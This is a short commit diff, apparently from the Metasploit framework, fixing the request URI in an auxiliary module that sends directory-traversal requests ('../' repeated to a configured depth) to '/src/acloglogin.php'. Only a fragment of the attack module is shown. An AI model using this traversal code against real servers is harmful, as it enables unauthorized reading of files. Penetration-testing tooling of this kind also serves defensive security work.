Correct path

unstable
sinn3r 2012-07-06 01:12:47 -05:00
parent 0c18662d46
commit 686f176a99
1 changed files with 1 additions and 2 deletions

View File

@ -52,10 +52,9 @@ class Metasploit3 < Msf::Auxiliary
travs = "../" * datastore['DEPTH'] travs = "../" * datastore['DEPTH']
# Create request # Create request
path = "/src/acloglogin.php"
res = send_request_raw({ res = send_request_raw({
'method' => 'GET', 'method' => 'GET',
'uri' => "path", 'uri' => "/src/acloglogin.php",
'headers' => 'headers' =>
{ {
'Connection' => "keep-alive", 'Connection' => "keep-alive",